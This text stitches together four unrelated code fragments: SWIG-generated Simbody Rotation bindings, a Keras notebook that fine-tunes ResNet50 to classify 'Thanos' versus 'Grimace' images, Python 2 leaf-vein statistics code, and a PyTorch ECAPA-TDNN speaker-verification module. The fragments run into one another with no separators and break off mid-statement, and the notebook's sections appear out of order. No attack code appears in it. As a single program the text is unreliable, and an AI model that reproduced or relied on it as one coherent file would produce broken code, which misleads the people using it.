Rotation Parameters ---------- angle: double nonUnitVector: SimTK::Vec3 const & """ return _simbody.Rotation_setRotationFromAngleAboutNonUnitVector(self, angle, nonUnitVector) def setRotationFromTwoAnglesTwoAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2): """ setRotationFromTwoAnglesTwoAxes(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, double angle1, CoordinateAxis axis1, double angle2, CoordinateAxis axis2) -> Rotation Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType angle1: double axis1: SimTK::CoordinateAxis const & angle2: double axis2: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromTwoAnglesTwoAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2) def setRotationFromThreeAnglesThreeAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2, angle3, axis3): """ setRotationFromThreeAnglesThreeAxes(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, double angle1, CoordinateAxis axis1, double angle2, CoordinateAxis axis2, double angle3, CoordinateAxis axis3) -> Rotation Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType angle1: double axis1: SimTK::CoordinateAxis const & angle2: double axis2: SimTK::CoordinateAxis const & angle3: double axis3: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromThreeAnglesThreeAxes(self, bodyOrSpace, angle1, axis1, angle2, axis2, angle3, axis3) def setRotationToBodyFixedXY(self, v): """ setRotationToBodyFixedXY(Rotation self, Vec2 v) Parameters ---------- v: SimTK::Vec2 const & """ return _simbody.Rotation_setRotationToBodyFixedXY(self, v) def setRotationFromQuaternion(self, q): """ setRotationFromQuaternion(Rotation self, Quaternion q) -> Rotation Parameters ---------- q: SimTK::Quaternion_< double > const & """ return _simbody.Rotation_setRotationFromQuaternion(self, q) def setRotationFromApproximateMat33(self, m): """ setRotationFromApproximateMat33(Rotation self, Mat33 m) -> Rotation Parameters ---------- m: SimTK::Mat33 const & """ return _simbody.Rotation_setRotationFromApproximateMat33(self, m) def setRotationFromOneAxis(self, uvec, axis): """ setRotationFromOneAxis(Rotation self, UnitVec3 uvec, CoordinateAxis axis) -> Rotation Parameters ---------- uvec: SimTK::UnitVec3 const & axis: SimTK::CoordinateAxis const """ return _simbody.Rotation_setRotationFromOneAxis(self, uvec, axis) def setRotationFromTwoAxes(self, uveci, axisi, vecjApprox, axisjApprox): """ setRotationFromTwoAxes(Rotation self, UnitVec3 uveci, CoordinateAxis axisi, Vec3 vecjApprox, CoordinateAxis axisjApprox) -> Rotation Parameters ---------- uveci: SimTK::UnitVec3 const & axisi: SimTK::CoordinateAxis const & vecjApprox: SimTK::Vec3 const & axisjApprox: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromTwoAxes(self, uveci, axisi, vecjApprox, axisjApprox) def convertOneAxisRotationToOneAngle(self, axis1): """ convertOneAxisRotationToOneAngle(Rotation self, CoordinateAxis axis1) -> double Parameters ---------- axis1: SimTK::CoordinateAxis const & """ return _simbody.Rotation_convertOneAxisRotationToOneAngle(self, axis1) def convertTwoAxesRotationToTwoAngles(self, bodyOrSpace, axis1, axis2): """ convertTwoAxesRotationToTwoAngles(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, CoordinateAxis axis1, CoordinateAxis axis2) -> Vec2 Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType axis1: SimTK::CoordinateAxis const & axis2: SimTK::CoordinateAxis const & """ return _simbody.Rotation_convertTwoAxesRotationToTwoAngles(self, bodyOrSpace, axis1, axis2) def convertThreeAxesRotationToThreeAngles(self, bodyOrSpace, axis1, axis2, axis3): """ convertThreeAxesRotationToThreeAngles(Rotation self, SimTK::BodyOrSpaceType bodyOrSpace, CoordinateAxis axis1, CoordinateAxis axis2, CoordinateAxis axis3) -> Vec3 Parameters ---------- bodyOrSpace: enum SimTK::BodyOrSpaceType axis1: SimTK::CoordinateAxis const & axis2: SimTK::CoordinateAxis const & axis3: SimTK::CoordinateAxis const & """ return
will use its already trained convolutional layers and # adapt (i.e., train) the classification head. # # ### Load pre-trained network # We will load the ResNet50 model. The first time, this might take a few (~5) minutes. # Afterwards, we will [freeze its convolutional layers](https://github.com/keras-team/keras/issues/4465#issuecomment-311000870) # to make sure we won't change them at all. # %% cnn_resnet50 = ResNet50(include_top=False, # Whether to include the fully-connected layer at the top (or not) weights='imagenet') # Weights were obtained trained on ImageNet. for conv_layer in cnn_resnet50.layers: conv_layer.trainable = False cnn_resnet50.summary() # %% [markdown] # We can see that this model has > 23 M parameters. Notice how _none_ of # them are trainable. It is worth mentioning this model is different # from our CNN from scratch not only in the number of parameters, but # also in its architecture. You can read more about it in the [original paper](http://openaccess.thecvf.com/content_cvpr_2016/papers/He_Deep_Residual_Learning_CVPR_2016_paper.pdf) # # ### Generate classification head # For the sake of comparision, we will use the same classification head as # in the previous case. The code is slightly different, since we need to # fetch the output layer of the pretrained CNN. Then we can start adding # layers. We will use `tf.keras`'s [`GlobalAveragePooling2D`](https://www.tensorflow.org/api_docs/python/tf/keras/layers/GlobalAveragePooling2D) # to average over the spatial locations and convert the features to a # 1D vector (per image). # %% x = cnn_resnet50.output x = layers.GlobalAveragePooling2D()(x) # Global average layer x = layers.Dense(64, activation='relu')(x) # Dense layer x = layers.Dense(32, activation='relu')(x) # Dense layer x = layers.Dense(1, activation='sigmoid')(x) # Prediction (output) layer model_tl = Model(cnn_resnet50.input, x) model_tl.summary() # %% [markdown] # Now we have 133,249 additional parameters that _are_ trainable. These # correspond to the classification head we just added. # # It is always a good sanity check to verify where do these parameters # come from. In our case: # # * $2048 \times 64$ weights from the global to the dense layer # * $64 \times 32$ weights from dense to dense layer # * $32 \times 1$ weights from dense to prediction layer # * $64$, $32$, and $1$ biases from the dense and the prediction layers # %% n_params_tl = (2048*64) + (64*32) + (32*1) + (64+32+1) print("TL trainable parameters = {0:d}".format(n_params_tl)) # %% [markdown] # Looks like we are good! # # ## Compiling our models. # Finally, we will define our models' optimizer, loss function, and metric # and compile the whole thing. We will use the same parameters for both models # (the one we built from scratch and the one we built using transfer learning) # for a fair comparison. # %% optimizer = tf.keras.optimizers.Adam() # Adam = RMSprop + Momentum (https://www.dlology.com/blog/quick-notes-on-how-to-choose-optimizer-in-keras/) loss = 'binary_crossentropy' # Since it is a binary classification (Thanos or Grimace) metrics = ['accuracy'] model_scratch.compile(loss=loss, optimizer=optimizer, metrics=metrics) model_tl.compile(loss=loss, optimizer=optimizer, metrics=metrics) # %% [markdown] # ## Model fitting # Fortunately, Keras makes fitting (i.e., training) a model very easy: # %% [markdown] # # Classification using CNNs # # ## Create data generators # We could manually load the images, pre-process them, and make them ready # for our task. However, `tf.keras` has an [ImageDataGenerator class](https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/image/ImageDataGenerator) # that will save us lots of trouble. # # First, we will create an ImageDataGenerator instance where we will define # the augmentation operations that we want. It is important to mention that # with `tf.keras` we have no control over the order in which the data # augmentation operations will be executed. We will also define the function # that will be implied on each input (`preprocessing_function`). Notice that # this function is model specific. Since we will be using the ResNet-50 model, # we will use its corresponding function (as defined in the preliminaries). # # Afterwards, we will apply the method [`flow_from_directory`](https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/image/ImageDataGenerator#flow_from_directory), # which will will generate batches of augmented data based on the data located # in the given path. # %% training_datagen = ImageDataGenerator( rotation_range=15, # Rotate images randomly withing this range (+/-). width_shift_range=0.1, # Translate images horizontally randomly within this proportion. height_shift_range=0.1, # Translate images vertically randomly within this proportion. shear_range=5, # Shear intensity (shear angle, [deg]). zoom_range=0.1, # Range for random zoom. vertical_flip=True, horizontal_flip=True, preprocessing_function=preprocess_input ) training_generator = training_datagen.flow_from_directory( directory=PATH_DATA/'training', batch_size=64, # Number of images per batch. Arbitrary. shuffle=True, class_mode='binary', # We have two possible outputs (Thanos or Grimace). target_size=(224, 224) # ResNet-50 requires these dimensions. ) # %% [markdown] # Now, we will create the generator for the validation set. It is pretty # much the same that for the training set, except we won't perform any # data augmentation. # %% validation_datagen = ImageDataGenerator(preprocessing_function=preprocess_input) validation_generator = validation_datagen.flow_from_directory( directory=PATH_DATA/'validation', batch_size=64, shuffle=False, class_mode='binary', target_size=(224, 224) ) # %% [markdown] # For practical reasons, we will generate the model only once. For future # runs of the script, we will load it from memory. Notice that we will need to # change this if we decide to implement something like # cross validation, for instance. # # In the future, I would like to look into [Git Large File Storage](https://git-lfs.github.com/) # for this type of things. # %% n_epochs = 50 model_scratch_name = 'model_scratch_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) if not (PATH_MODELS/(model_scratch_name + '.h5')).exists(): history_scratch_ = model_scratch.fit_generator( generator=training_generator, epochs=n_epochs, validation_data=validation_generator) model_scratch.save(PATH_MODELS/(model_scratch_name + '.h5')) # Save history. history_scratch = history_scratch_.history pickle.dump(history_scratch, open((PATH_MODELS/('history_' + model_scratch_name + '.p')), "wb" )) else: # Load model. model_scratch = tf.keras.models.load_model((PATH_MODELS/(model_scratch_name + '.h5'))) # Load history. history_scratch = pickle.load(open((PATH_MODELS/('history_' + model_scratch_name + '.p')), "rb" )) model_tl_name = 'model_tl_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) if not (PATH_MODELS/(model_tl_name + '.h5')).exists(): history_tl_ = model_tl.fit_generator( generator=training_generator, epochs=n_epochs, validation_data=validation_generator) model_tl.save(PATH_MODELS/(model_tl_name + '.h5')) # Save history. history_tl = history_tl_.history pickle.dump(history_tl, open((PATH_MODELS/('history_' + model_tl_name + '.p')), "wb" )) else: # Load model. model_tl = tf.keras.models.load_model((PATH_MODELS/(model_tl_name + '.h5'))) # Load history. history_tl = pickle.load(open((PATH_MODELS/('history_' + model_tl_name + '.p')), "rb" )) # %% [markdown] # Remember that training the model is very likely what will take the longest, # specially for a large number of epochs. # # ## Model evaluation # There are several ways to evaluate the performance of the model. # # ### Learning curves # Learning curves can show the evolution of the accuracy through the # epochs. Furthermore, they can also be a [valuable tool for diagnosing # issues in our model.](https://machinelearningmastery.com/learning-curves-for-diagnosing-machine-learning-model-performance/) # We can generate them very easily from the model history. # %% epochs = range(1, n_epochs+1) for model_hist, model_name in zip([history_scratch, history_tl], ['model_scratch', 'model_tl']): fig, ax = plt.subplots(2, 1, figsize=[8, 8]) # Accuracy ax[0].plot(epochs, model_hist['accuracy'], linewidth=3, label="Training accuracy") ax[0].plot(epochs, model_hist['val_accuracy'], linewidth=3, label="Validation accuracy") ax[0].legend(loc=(1.04, 0.75), frameon=False) #ax[0].set_ylim([0, 1]) ax[0].set_ylabel("Accuracy", fontweight='bold') ax[0].set_title(model_name, fontweight='bold') # Loss ax[1].plot(epochs, model_hist['loss'], linewidth=3, label="Training loss") ax[1].plot(epochs, model_hist['val_loss'], linewidth=3, label="Validation loss") ax[1].legend(loc=(1.04, 0.75), frameon=False) #ax[1].set_ylim([0, 1]) ax[1].set_xlabel("Epoch", fontweight='bold') ax[1].set_ylabel("Loss", fontweight='bold') fig.savefig(PATH_RESULTS/(model_name + '_epochs=' + str(n_epochs) + '_vprop={0:.2f}'.format(val_prop) + '.pdf'), bbox_inches='tight', dpi=150) # %% [markdown] # We can clearly see that the TL model performs way better than the one # we developed from scratch (actually, the behaviour of the from-scratch model # is a bit weird - I will investigate that in the future). Thus, we will use # the former for the rest of this notebook. # # ### Show predictions # We can actually feed any image to the model and see what probabilities it # yields (and therefore its predictions). In this case, we will take a look # at a random sample of the validation images. You can run the following cell # several times to take a new set of images. # %% images_validation_path = list() for item in (PATH_DATA/'validation').glob('**/*'): if not item.is_dir(): images_validation_path.append(item) n_images_validation = 3 images_validation_path = random.sample(images_validation_path, n_images_validation) images_validation = [Image.open(image_validation_path) for image_validation_path in images_validation_path] # Remember to preprocess the input! image_batch = list() image_batch = np.stack([preprocess_input(np.array(image_validation.resize((224, 224)))) for image_validation in images_validation]) prediction_probabilities = model_tl.predict(image_batch) fig, axes = plt.subplots(1, n_images_validation, figsize=(15, 5)) for ii, image in enumerate(images_validation): axes[ii].imshow(image) axes[ii].set_title("Thanos {:.1f}%, Grimace {:.1f}%".format(100*prediction_probabilities[ii,0], 100*(1-prediction_probabilities[ii,0]))) axes[ii].axis('off') # %% [markdown] # ### Bonus: Grimos # Lastly, I want to try the model with images that I consider specially # tricky: Grimos. See the [README file](../README.md) for more about him. # %% images_grimos_path = list() for item in (PATH_DATA/'images'/'_grimos').glob('**/*'): if not item.is_dir(): images_grimos_path.append(item) n_images_grimos = 3 images_grimos_path = random.sample(images_grimos_path, n_images_validation) images_grimos = [Image.open(image_grimos_path) for image_grimos_path in images_grimos_path] # Remember to preprocess the input! image_batch = list() image_batch = np.stack([preprocess_input(np.array(image_grimos.resize((224, 224)))) for image_grimos in images_grimos]) prediction_probabilities = model_tl.predict(image_batch) fig, axes = plt.subplots(1, n_images_grimos, figsize=(15, 5)) for ii, image in enumerate(images_grimos): axes[ii].imshow(image) axes[ii].set_title("Thanos {:.1f}%, Grimace {:.1f}%".format(100*prediction_probabilities[ii,0], 100*(1-prediction_probabilities[ii,0]))) axes[ii].axis('off') # %% [markdown] # Surprisingly, the model predicts that Grimos is
edge, reverse=False): if reverse: return self.follow_highest_width_path(G, (edge[1], edge[0])) u, v = edge visited = set([u]) path = [u] path_edges = [(u, v)] while True: path.append(v) visited.add(v) a, b = path_edges[-1] cur_width = G[a][b]['conductivity'] nexts = sorted([(G[v][n]['conductivity'], n) for n in G.neighbors_iter(v) if not n in visited and G[v][n]['conductivity'] < cur_width]) if len(nexts) > 0: v = nexts[-1][1] path_edges.append((path[-1], v)) else: break return path, path_edges def smoothen_path(self, verts, reps=50): for i in xrange(reps): avgs = 0.25*(verts[:-2] + 2*verts[1:-1] + verts[2:]) verts[1:-1] = avgs def fit_ellipse_to_points(self, x, y): """ Fit an ellipse to the given point set, return semimajor and semiminor axes """ aa = fit_ellipse(x, y) a, b = ellipse_axis_length(aa) x0, y0 = ellipse_center(aa) phi = ellipse_angle_of_rotation(aa) return a, b, x0, y0, phi def main_vein_length_by_ellipse(self, show_plot=True): # estimate main vein length by fitting an ellipse to the # leaf margin and using twice the semimajor axis as length # estimate cy = self.marked_tree.node[self.marked_tree.graph['root']]['cycle'] a, b, x0, y0, phi = \ self.fit_ellipse_to_points(cy.coords[:,0], cy.coords[:,1]) print "Fitted ellipse axes: {}, {}".format(2*a, 2*b) if show_plot: plt.figure() plot.draw_leaf(self.lowres_graph) plt.scatter(cy.coords[:,0], cy.coords[:,1]) phis = arange(0, 2*pi, 0.01) xx = x0 + a*cos(phis)*cos(phi) - b*sin(phis)*sin(phi) yy = y0 + a*cos(phis)*sin(phi) + b*sin(phis)*cos(phi) plt.plot(xx, yy) plt.show() return 2*max(a, b) def main_vein_length_by_largest_pdist(self): # Calculate largest distance between any two points # on the leaf margin cy = self.marked_tree.node[self.marked_tree.graph['root']]['cycle'] length = max(pdist(cy.coords)) print "Largest distance between any two points on margin:", length return length def main_vein_length(self, G, show_plot=True): # Use only largest connected component, assuming it contains # the leaf G = G.subgraph(sorted_connected_components_copy(G)[0]) # Now that this is fixed, onto the actual main veins veins = sorted([(d['conductivity'], d['weight'], sqrt((G.node[u]['x'] - G.node[v]['x'])**2 + (G.node[u]['y'] - G.node[v]['y'])**2), (u, v)) for u, v, d in G.edges_iter(data=True)]) lengths = [l for d, l, r, e in veins] geom_lengths = [r for d, l, r, e in veins] print "Fixing main vein length..." len_ellipse = self.main_vein_length_by_ellipse(show_plot=show_plot) len_pdist = self.main_vein_length_by_largest_pdist() # Sophisticated fix necessary. # Idea: find longest paths of highest width elements # and straighten them out. major_nodes = array([e for d, l, r, e in veins]).flatten() # We must not allow loops. This modified version of # MST finds a spanning tree including the largest edges, # so we always get the main vein G_major = minimum_spanning_tree(G.subgraph(major_nodes), weight='conductivity') highest_edge = veins[-1][3] # Detect main vein. p1, pe1 = self.follow_highest_width_path(G_major, highest_edge) p2, pe2 = self.follow_highest_width_path(G_major, highest_edge, reverse=True) # Find coordinates and smoothen them out main_vein_path = p2[::-1] + p1[2:] main_vein_coords = array([[G.node[n]['x'], G.node[n]['y']] for n in main_vein_path]) self.smoothen_path(main_vein_coords) # Calculate length and save dx = diff(main_vein_coords, axis=0) lens = sqrt((dx**2).sum(-1)[...,newaxis]) length = sum(lens) print "Main vein length (smoothened):", length diams = array([G[u][v]['conductivity'] for u, v in pe1] + \ [G[u][v]['conductivity'] for u, v in pe2[1:]]) if show_plot: plt.figure() plot.draw_leaf(self.lowres_graph) plot.draw_leaf(self.leaf, edge_list=pe1, color='r') plot.draw_leaf(self.leaf, edge_list=pe2, color='g') plt.show() # fix vein lengths #print main_vein_path for (u, v), fl in izip(pairwise(main_vein_path), lens): G[u][v]['weight'] = fl return lens, diams, len_ellipse, len_pdist def vein_stats(self, G): """ Returns vein statistics of graph G. Parameters: G: A networkx graph with edge attributes 'conductivity' and 'weight' Returns: veins: (conductivity, weight) pairs minor_vein_thresh: Threshold width for minor veins minor_vein_diameters minor_vein_lengths """ # Vein statistics veins = np.array([[d['conductivity'], d['weight']] for u, v, d in G.edges_iter(data=True)]) lengths = [l for d, l in veins] diameters = [d for d, l in veins] # minor veins - lower 95% of vein diameters minor_vein_thresh = percentile(diameters, q=95) minor_vein_lengths = [l for l in lengths if l > minor_vein_thresh] minor_vein_diameters = [d['conductivity'] for u, v, d in G.edges_iter(data=True) if d['conductivity'] < minor_vein_thresh] return veins, minor_vein_thresh, minor_vein_diameters, \ minor_vein_lengths def calculate_vein_distances(self): """ approximate vein distances by fitting ellipses to the areoles, and taking the semiminor axis as an estimate for the incircle radius """ distances = [] for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: coords = self.marked_tree_no_ext.node[n]['cycle'].coords a, b, x0, y0, phi = self.fit_ellipse_to_points( coords[:,0], coords[:,1]) distances.append(min(a, b)) distances = real(array(distances)) distances = distances[logical_not(isnan(distances))] return distances def calculate_vein_distances_chebyshev(self): """ approximate vein distances by finding the chebyshev centers of the areoles, and taking the radii. """ distances = [] cvx.solvers.options['show_progress'] = False for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: coords = self.marked_tree_no_ext.node[n]['cycle'].coords # find convex hull to make approximation # possible hull = ConvexHull(coords) coords = coords[hull.vertices,:] # shift to zero center of gravity cog = coords.mean(axis=0) coords -= cog # append last one coords = vstack((coords, coords[0,:])) # Find Chebyshev center X = cvx.matrix(coords) m = X.size[0] - 1 # Inequality description G*x <= h with h = 1 G, h = cvx.matrix(0.0, (m,2)), cvx.matrix(0.0, (m,1)) G = (X[:m,:] - X[1:,:]) * cvx.matrix([0., -1., 1., 0.], (2,2)) h = (G * X.T)[::m+1] G = cvx.mul(h[:,[0,0]]**-1, G) h = cvx.matrix(1.0, (m,1)) # Chebyshev center R = variable() xc = variable(2) lp = op(-R, [ G[k,:]*xc + R*cvx.blas.nrm2(G[k,:]) <= h[k] for k in xrange(m) ] +[ R >= 0] ) lp.solve() R = R.value xc = xc.value #plt.figure(facecolor='w') ## polyhedron #for k in range(m): # edge = X[[k,k+1],:] + 0.1 * cvx.matrix([1., 0., 0., -1.], (2,2)) * \ # (X[2*[k],:] - X[2*[k+1],:]) # plt.plot(edge[:,0], edge[:,1], 'k') ## 1000 points on the unit circle #nopts = 1000 #angles = cvx.matrix( [ a*2.0*pi/nopts for a in range(nopts) ], (1,nopts) ) #circle = cvx.matrix(0.0, (2,nopts)) #circle[0,:], circle[1,:] = R*cvx.cos(angles), R*cvx.sin(angles) #circle += xc[:,nopts*[0]] ## plot maximum inscribed disk #plt.fill(circle[0,:].T, circle[1,:].T, facecolor = '#F0F0F0') #plt.plot([xc[0]], [xc[1]], 'ko') #plt.title('Chebyshev center (fig 8.5)') #plt.axis('equal') #plt.axis('off') #plt.show() if lp.status == 'optimal': distances.append(R[0]) return array(distances) def width_degree_distribution(self, show_plot=True): """ Calculate the vein width as a function of degree """ widths_radii = [] for n, d in self.marked_tree.nodes_iter(data=True): if d['cycle'] != None: rads = d['cycle'].radii() deg = d['subtree-degree'] #w_r = [[deg, r] for r in rads] #widths_radii.extend(w_r) widths_radii.append([deg, rads.mean()]) widths_radii = array(widths_radii) if show_plot: plt.figure() plt.scatter(widths_radii[:,0], widths_radii[:,1]) plt.xlabel('subtree degree') plt.ylabel('mean vein radii') plt.show() def calculate_statistics(self, show_plot=True, interactive=True): """ Calculates vein statistics for the given leaf. """ # widths-degrees self.width_degree_distribution(show_plot=show_plot) # Fix main vein lengths. main_lens, main_diams, main_len_ellipse, main_len_pdist = \ self.main_vein_length(self.leaf, show_plot=show_plot) veins, minor_vein_thresh, minor_vein_diameters, \ minor_vein_lengths = self.vein_stats(self.fixed_leaf) # largest loop (outer loop) leaf_area = self.marked_tree.node[self.marked_tree.graph['root']]['cycle_area'] # leaf area #points = np.array([(d['x'], d['y']) # for n, d in self.fixed_leaf.nodes_iter(data=True)]) #ch = ConvexHull(points) # #pts_closed = np.array(list(points[ch.vertices,:]) + # list([points[ch.vertices[0],:]])) #leaf_area = polygon_area(pts_closed) minor_vein_density = sum(minor_vein_lengths)/leaf_area minor_vein_diameter = mean(minor_vein_diameters) minor_vein_diameter_std = std(minor_vein_diameters) lengths = array([l for d, l in veins]) diameters = array([d for d, l in veins]) print "Minor vein diameter threshold:", minor_vein_thresh print "Minor vein density: {} 1/px".format(minor_vein_density) print "Minor vein diameter: {} +- {} px".format(minor_vein_diameter, minor_vein_diameter_std) print "Total vein density:", veins[:,1].sum()/leaf_area areole_areas = [] for n, d in self.marked_tree_no_ext.degree_iter(): if d == 1: areole_areas.append( self.marked_tree_no_ext.node[n]['cycle_area']) num_areoles = len(areole_areas) print "Number of areoles:", num_areoles vein_distances = self.calculate_vein_distances_chebyshev() print "# Vein distances:", len(vein_distances) print "Avg. vein distance:", vein_distances.mean() if show_plot: # Vein statistics plt.figure() plt.title("Vein diameters") plt.xlabel("Vein diameter (px)") plt.ylabel("Number of veins") plt.hist(diameters, bins=50) plt.axvline(x=mean(diameters), color='r', linewidth=2) plt.axvline(x=median(diameters), color='g', linewidth=2) plt.figure() plt.title("Weighted vein diameters") plt.xlabel("diameter $\\times$ length") plt.hist(diameters*lengths, bins=50) plt.figure() plt.title("Areole areas") plt.xlabel("areole area ($\mathrm{px}^2$)") plt.hist(areole_areas, bins=50) plt.axvline(x=mean(areole_areas), color='r', linewidth=2) plt.axvline(x=median(areole_areas), color='g', linewidth=2) plt.figure() plt.title("Vein lengths") plt.xlabel("Vein length (px)") plt.ylabel("Number of veins") plt.hist(lengths, bins=50) plt.axvline(x=mean(lengths), color='r', linewidth=2) plt.axvline(x=median(lengths), color='g', linewidth=2) plt.figure() plt.title("Vein distances") plt.xlabel("Vein distance (px)") plt.ylabel("Number of areoles") plt.hist(vein_distances, bins=50) plt.axvline(x=mean(vein_distances), color='r', linewidth=2) plt.axvline(x=median(vein_distances), color='g', linewidth=2) plt.show() # Save statistics # Make sure stats directory exists if not os.path.exists(self.stats_dir): os.makedirs(self.stats_dir) # Save stuff savetxt(self.stats_dir + 'leaf_area.txt', array([leaf_area])) savetxt(self.stats_dir + 'minor_vein_threshold.txt', array([minor_vein_thresh])) savetxt(self.stats_dir + 'minor_vein_diameters.txt', array(minor_vein_diameters)) savetxt(self.stats_dir + 'minor_vein_lengths.txt', array(minor_vein_lengths)) savetxt(self.stats_dir + 'vein_diameters_lengths.txt', array(veins)) savetxt(self.stats_dir + 'number_areoles.txt', array([num_areoles])) savetxt(self.stats_dir + 'areole_areas.txt', array(areole_areas)) savetxt(self.stats_dir + 'vein_distances.txt', vein_distances)
<reponame>hiimmuc/Speaker-verification<filename>models/ECAPA_TDNN.py import torch # noqa: F401 import torch.nn as nn import torch.nn.functional as F from models.ECAPA_utils import Conv1d as _Conv1d from models.ECAPA_utils import BatchNorm1d as _BatchNorm1d from utils import PreEmphasis import torchaudio class FbankAug(nn.Module): def __init__(self, freq_mask_width = (0, 8), time_mask_width = (0, 10)): self.time_mask_width = time_mask_width self.freq_mask_width = freq_mask_width super().__init__() def mask_along_axis(self, x, dim): original_size = x.shape batch, fea, time = x.shape if dim == 1: D = fea width_range = self.freq_mask_width else: D = time width_range = self.time_mask_width mask_len = torch.randint(width_range[0], width_range[1], (batch, 1), device=x.device).unsqueeze(2) mask_pos = torch.randint(0, max(1, D - mask_len.max()), (batch, 1), device=x.device).unsqueeze(2) arange = torch.arange(D, device=x.device).view(1, 1, -1) mask = (mask_pos <= arange) * (arange < (mask_pos + mask_len)) mask = mask.any(dim=1) if dim == 1: mask = mask.unsqueeze(2) else: mask = mask.unsqueeze(1) x = x.masked_fill_(mask, 0.0) return x.view(*original_size) def forward(self, x): x = self.mask_along_axis(x, dim=2) x = self.mask_along_axis(x, dim=1) return x def length_to_mask(length, max_len=None, dtype=None, device=None): """Creates a binary mask for each sequence. Reference: https://discuss.pytorch.org/t/how-to-generate-variable-length-mask/23397/3 Arguments --------- length : torch.LongTensor Containing the length of each sequence in the batch. Must be 1D. max_len : int Max length for the mask, also the size of the second dimension. dtype : torch.dtype, default: None The dtype of the generated mask. device: torch.device, default: None The device to put the mask variable. Returns ------- mask : tensor The binary mask. Example ------- >>> length=torch.Tensor([1,2,3]) >>> mask=length_to_mask(length) >>> mask tensor([[1., 0., 0.], [1., 1., 0.], [1., 1., 1.]]) """ assert len(length.shape) == 1 if max_len is None: max_len = length.max().long().item() # using arange to generate mask mask = torch.arange( max_len, device=length.device, dtype=length.dtype ).expand(len(length), max_len) < length.unsqueeze(1) if dtype is None: dtype = length.dtype if device is None: device = length.device mask = torch.as_tensor(mask, dtype=dtype, device=device) return mask # Skip transpose as much as possible for efficiency class Conv1d(_Conv1d): def __init__(self, *args, **kwargs): super().__init__(skip_transpose=True, *args, **kwargs) class BatchNorm1d(_BatchNorm1d): def __init__(self, *args, **kwargs): super().__init__(skip_transpose=True, *args, **kwargs) class TDNNBlock(nn.Module): """An implementation of TDNN. Arguments ---------- in_channels : int Number of input channels. out_channels : int The number of output channels. kernel_size : int The kernel size of the TDNN blocks. dilation : int The dilation of the Res2Net block. activation : torch class A class for constructing the activation layers. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> layer = TDNNBlock(64, 64, kernel_size=3, dilation=1) >>> out_tensor = layer(inp_tensor).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, kernel_size, dilation, activation=nn.ReLU, ): super(TDNNBlock, self).__init__() self.conv = Conv1d( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, dilation=dilation, ) self.activation = activation() self.norm = BatchNorm1d(input_size=out_channels) def forward(self, x): return self.norm(self.activation(self.conv(x))) class Res2NetBlock(torch.nn.Module): """An implementation of Res2NetBlock w/ dilation. Arguments --------- in_channels : int The number of channels expected in the input. out_channels : int The number of output channels. scale : int The scale of the Res2Net block. kernel_size: int The kernel size of the Res2Net block. dilation : int The dilation of the Res2Net block. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> layer = Res2NetBlock(64, 64, scale=4, dilation=3) >>> out_tensor = layer(inp_tensor).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, scale=8, kernel_size=3, dilation=1 ): super(Res2NetBlock, self).__init__() assert in_channels % scale == 0 assert out_channels % scale == 0 in_channel = in_channels // scale hidden_channel = out_channels // scale self.blocks = nn.ModuleList( [ TDNNBlock( in_channel, hidden_channel, kernel_size=kernel_size, dilation=dilation, ) for i in range(scale - 1) ] ) self.scale = scale def forward(self, x): y = [] for i, x_i in enumerate(torch.chunk(x, self.scale, dim=1)): if i == 0: y_i = x_i elif i == 1: y_i = self.blocks[i - 1](x_i) else: y_i = self.blocks[i - 1](x_i + y_i) y.append(y_i) y = torch.cat(y, dim=1) return y class SEBlock(nn.Module): """An implementation of squeeze-and-excitation block. Arguments --------- in_channels : int The number of input channels. se_channels : int The number of output channels after squeeze. out_channels : int The number of output channels. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> se_layer = SEBlock(64, 16, 64) >>> lengths = torch.rand((8,)) >>> out_tensor = se_layer(inp_tensor, lengths).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__(self, in_channels, se_channels, out_channels): super(SEBlock, self).__init__() self.conv1 = Conv1d( in_channels=in_channels, out_channels=se_channels, kernel_size=1 ) self.relu = torch.nn.ReLU(inplace=True) self.conv2 = Conv1d( in_channels=se_channels, out_channels=out_channels, kernel_size=1 ) self.sigmoid = torch.nn.Sigmoid() def forward(self, x, lengths=None): L = x.shape[-1] if lengths is not None: mask = length_to_mask(lengths * L, max_len=L, device=x.device) mask = mask.unsqueeze(1) total = mask.sum(dim=2, keepdim=True) s = (x * mask).sum(dim=2, keepdim=True) / total else: s = x.mean(dim=2, keepdim=True) s = self.relu(self.conv1(s)) s = self.sigmoid(self.conv2(s)) return s * x class AttentiveStatisticsPooling(nn.Module): """This class implements an attentive statistic pooling layer for each channel. It returns the concatenated mean and std of the input tensor. Arguments --------- channels: int The number of input channels. attention_channels: int The number of attention channels. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> asp_layer = AttentiveStatisticsPooling(64) >>> lengths = torch.rand((8,)) >>> out_tensor = asp_layer(inp_tensor, lengths).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 1, 128]) """ def __init__(self, channels, attention_channels=128, global_context=True): super().__init__() self.eps = 1e-12 self.global_context = global_context if global_context: self.tdnn = TDNNBlock(channels * 3, attention_channels, 1, 1) else: self.tdnn = TDNNBlock(channels, attention_channels, 1, 1) self.tanh = nn.Tanh() self.conv = 